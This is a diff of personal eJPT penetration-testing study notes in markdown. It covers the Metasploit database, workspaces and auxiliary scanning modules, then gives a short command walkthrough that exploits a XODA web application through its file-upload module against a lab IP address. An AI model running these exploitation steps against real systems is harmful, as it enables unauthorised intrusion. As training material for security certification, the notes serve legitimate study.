Maercusxch/eJPT_Notes/2_Assessment Methodologies/03_Enumeration.md

 - Verify that the MSF database is connected: `db_status`
 - Import the the Nmap Scan Results: `db_import nmapscan.xml`
 - Check the results: `hosts` and `services`

+### Auxiliary Modules
+An Auxiliary Module is a type of module within a system that includes exploits without payloads and enhances the functionality of the system by performing tasks like remote system scanning and fingerprinting.
+They are used to perform functionality, discovery and fuzzing.
+Against NMAP scans, auxiliary modules are more effective in the post-exploitation phase because they allow us to identify whether the server or PC, whose IP we have, is part of an internal network.
+Additionally, this may enable us to exploit other devices.

+**Practical:**
+- First check your IP address: `ifconfig`
+- Make sure the postgreSQL service is started: `service postgresql start`
+- Start msfconsole: `msfconsole`
+- Check Database status: `db_status` If connection type = postgresql everything is allright.
+- Add a Workspace: `workspace -a "examplename"`
+- You can check the current workspace your working in with`workspace` (the res star shows your selected workspace)
+- You can change the current workspace with `workspace "name of the workspace you want"`
+- Search Auxiliary Modules: `search (portscan)`
+- You can select and use a module by: `use (name of the module or number)`
+- `show options`
+- Set the RHOST `set RHOSTS 192.168.20.3`
+- execute the module: `run`
+- downloading the webpage of the IP adress to what we can identify: `curl 192.168.20.3`

+**Exploiting XODA-Device (what we just curled)**
+- `search Xoda`
+- `run exploit/unix/webapp/xoda_file_upload`
+- `show options`
+- `set RHOST 192.168.20.3`
+- set Path on the Xoda device to root: `set TARGETURI /`
+- run our exploit: `exploit`